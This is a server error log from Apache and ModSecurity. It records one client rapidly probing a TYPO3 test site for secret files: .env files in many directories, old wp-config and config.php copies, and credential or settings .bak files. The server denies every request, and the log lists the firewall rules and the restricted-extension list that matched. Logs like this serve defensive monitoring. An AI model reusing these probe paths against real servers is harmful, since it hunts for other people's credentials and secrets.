[Sun Jan 18 08:30:47.549084 2026] [:error] [pid 1490430] [client 185.177.72.66:5896] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /run/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/run/.env"] [unique_id "aWyMJ3_pW_x3uW4HPonnOAAAABQ"]
[Sun Jan 18 08:30:47.549286 2026] [:error] [pid 1490430] [client 185.177.72.66:5896] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/run/.env"] [unique_id "aWyMJ3_pW_x3uW4HPonnOAAAABQ"]
[Sun Jan 18 08:30:47.549460 2026] [:error] [pid 1490430] [client 185.177.72.66:5896] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/run/.env"] [unique_id "aWyMJ3_pW_x3uW4HPonnOAAAABQ"]
[Sun Jan 18 08:30:47.550023 2026] [:error] [pid 1490427] [client 185.177.72.66:5894] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /secrets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/secrets/.env"] [unique_id "aWyMJ_OSlCB311YmT4BFIwAAABE"]
[Sun Jan 18 08:30:47.550237 2026] [:error] [pid 1490427] [client 185.177.72.66:5894] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/secrets/.env"] [unique_id "aWyMJ_OSlCB311YmT4BFIwAAABE"]
[Sun Jan 18 08:30:47.550428 2026] [:error] [pid 1490427] [client 185.177.72.66:5894] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/secrets/.env"] [unique_id "aWyMJ_OSlCB311YmT4BFIwAAABE"]
[Sun Jan 18 08:30:47.551514 2026] [:error] [pid 1488428] [client 185.177.72.66:5850] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/k8s/.env"] [unique_id "aWyMJ2OYMY3SUwS4bRsNxAAAAAU"]
[Sun Jan 18 08:30:47.551686 2026] [authz_core:error] [pid 1490422] [client 185.177.72.66:5884] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/sites
[Sun Jan 18 08:30:47.551710 2026] [:error] [pid 1488428] [client 185.177.72.66:5850] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/k8s/.env"] [unique_id "aWyMJ2OYMY3SUwS4bRsNxAAAAAU"]
[Sun Jan 18 08:30:47.551848 2026] [:error] [pid 1488428] [client 185.177.72.66:5850] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/k8s/.env"] [unique_id "aWyMJ2OYMY3SUwS4bRsNxAAAAAU"]
[Sun Jan 18 08:30:47.553365 2026] [:error] [pid 1490426] [client 185.177.72.66:5864] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/terraform/.env"] [unique_id "aWyMJ7--SNtJTJfJyMPK_gAAABA"]
[Sun Jan 18 08:30:47.553553 2026] [:error] [pid 1490426] [client 185.177.72.66:5864] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/terraform/.env"] [unique_id "aWyMJ7--SNtJTJfJyMPK_gAAABA"]
[Sun Jan 18 08:30:47.553714 2026] [:error] [pid 1490426] [client 185.177.72.66:5864] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/terraform/.env"] [unique_id "aWyMJ7--SNtJTJfJyMPK_gAAABA"]
[Sun Jan 18 08:30:47.554694 2026] [authz_core:error] [pid 1488394] [client 185.177.72.66:5912] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sun Jan 18 08:30:47.654283 2026] [:error] [pid 1488394] [client 185.177.72.66:5980] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWyMJ6sS5gpCu1g21rG0ZAAAAAI"]
[Sun Jan 18 08:30:47.657346 2026] [:error] [pid 1490426] [client 185.177.72.66:5986] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWyMJ7--SNtJTJfJyMPK_wAAABA"]
[Sun Jan 18 08:30:47.657537 2026] [:error] [pid 1490426] [client 185.177.72.66:5986] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWyMJ7--SNtJTJfJyMPK_wAAABA"]
[Sun Jan 18 08:30:47.657682 2026] [:error] [pid 1490426] [client 185.177.72.66:5986] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWyMJ7--SNtJTJfJyMPK_wAAABA"]
[Sun Jan 18 08:30:47.666540 2026] [:error] [pid 1488394] [client 185.177.72.66:5980] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWyMJ6sS5gpCu1g21rG0ZAAAAAI"]
[Sun Jan 18 08:30:47.666708 2026] [:error] [pid 1488394] [client 185.177.72.66:5980] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWyMJ6sS5gpCu1g21rG0ZAAAAAI"]
[Sun Jan 18 08:30:47.787224 2026] [:error] [pid 1490426] [client 185.177.72.66:6056] [client 185.177.72.66] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config.php.old"] [unique_id "aWyMJ7--SNtJTJfJyMPLAAAAABA"]
[Sun Jan 18 08:30:47.787457 2026] [:error] [pid 1490430] [client 185.177.72.66:6034] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWyMJ3_pW_x3uW4HPonnOgAAABQ"]
[Sun Jan 18 08:30:47.787617 2026] [:error] [pid 1490426] [client 185.177.72.66:6056] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config.php.old"] [unique_id "aWyMJ7--SNtJTJfJyMPLAAAAABA"]
[Sun Jan 18 08:30:47.787649 2026] [:error] [pid 1490430] [client 185.177.72.66:6034] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWyMJ3_pW_x3uW4HPonnOgAAABQ"]
[Sun Jan 18 08:30:47.787772 2026] [:error] [pid 1490426] [client 185.177.72.66:6056] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config.php.old"] [unique_id "aWyMJ7--SNtJTJfJyMPLAAAAABA"]
[Sun Jan 18 08:30:47.787831 2026] [:error] [pid 1490430] [client 185.177.72.66:6034] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWyMJ3_pW_x3uW4HPonnOgAAABQ"]
[Sun Jan 18 08:30:47.790896 2026] [:error] [pid 1488394] [client 185.177.72.66:6030] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lambda/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lambda/.env"] [unique_id "aWyMJ6sS5gpCu1g21rG0ZQAAAAI"]
[Sun Jan 18 08:30:47.791055 2026] [:error] [pid 1488394] [client 185.177.72.66:6030] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lambda/.env"] [unique_id "aWyMJ6sS5gpCu1g21rG0ZQAAAAI"]
[Sun Jan 18 08:30:47.791204 2026] [:error] [pid 1488394] [client 185.177.72.66:6030] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lambda/.env"] [unique_id "aWyMJ6sS5gpCu1g21rG0ZQAAAAI"]
[Sun Jan 18 08:30:47.792045 2026] [authz_core:error] [pid 1488428] [client 185.177.72.66:6070] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.json.bak
[Sun Jan 18 08:30:47.795174 2026] [authz_core:error] [pid 1490427] [client 185.177.72.66:6074] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/appsettings.json.bak
[Sun Jan 18 08:30:47.801819 2026] [:error] [pid 1490420] [client 185.177.72.66:6046] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /functions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/functions/.env"] [unique_id "aWyMJ2iGArOZVa4E_tBQbAAAAAs"]
[Sun Jan 18 08:30:47.802004 2026] [:error] [pid 1490420] [client 185.177.72.66:6046] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/functions/.env"] [unique_id "aWyMJ2iGArOZVa4E_tBQbAAAAAs"]
[Sun Jan 18 08:30:47.802148 2026] [:error] [pid 1490420] [client 185.177.72.66:6046] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/functions/.env"] [unique_id "aWyMJ2iGArOZVa4E_tBQbAAAAAs"]
[Sun Jan 18 08:30:47.804484 2026] [:error] [pid 1490423] [client 185.177.72.66:6026] [client 185.177.72.66] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aWyMJz5UUmmifVbk5ArT_QAAAA4"]
[Sun Jan 18 08:30:47.804879 2026] [:error] [pid 1490423] [client 185.177.72.66:6026] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aWyMJz5UUmmifVbk5ArT_QAAAA4"]
[Sun Jan 18 08:30:47.805109 2026] [:error] [pid 1490423] [client 185.177.72.66:6026] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aWyMJz5UUmmifVbk5ArT_QAAAA4"]
[Sun Jan 18 08:30:47.805271 2026] [:error] [pid 1490423] [client 185.177.72.66:6026] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aWyMJz5UUmmifVbk5ArT_QAAAA4"]
[Sun Jan 18 08:30:47.887357 2026] [authz_core:error] [pid 1488428] [client 185.177.72.66:6134] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml.bak
[Sun Jan 18 08:30:47.895260 2026] [authz_core:error] [pid 1490427] [client 185.177.72.66:6154] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/settings.json.bak
[Sun Jan 18 08:30:47.899549 2026] [:error] [pid 1490422] [client 185.177.72.66:6090] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/worker/.env"] [unique_id "aWyMJ5Y4_YWQnzrblW6AXAAAAA0"]
[Sun Jan 18 08:30:47.899712 2026] [:error] [pid 1490422] [client 185.177.72.66:6090] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/worker/.env"] [unique_id "aWyMJ5Y4_YWQnzrblW6AXAAAAA0"]
[Sun Jan 18 08:30:47.899866 2026] [:error] [pid 1490422] [client 185.177.72.66:6090] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/worker/.env"] [unique_id "aWyMJ5Y4_YWQnzrblW6AXAAAAA0"]
[Sun Jan 18 08:30:47.933490 2026] [authz_core:error] [pid 1490419] [client 185.177.72.66:6174] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/secrets.json.bak
[Sun Jan 18 08:30:47.995255 2026] [authz_core:error] [pid 1490430] [client 185.177.72.66:6180] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/credentials.json.bak
[Sun Jan 18 08:30:47.999221 2026] [authz_core:error] [pid 1490423] [client 185.177.72.66:6206] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/env.yaml
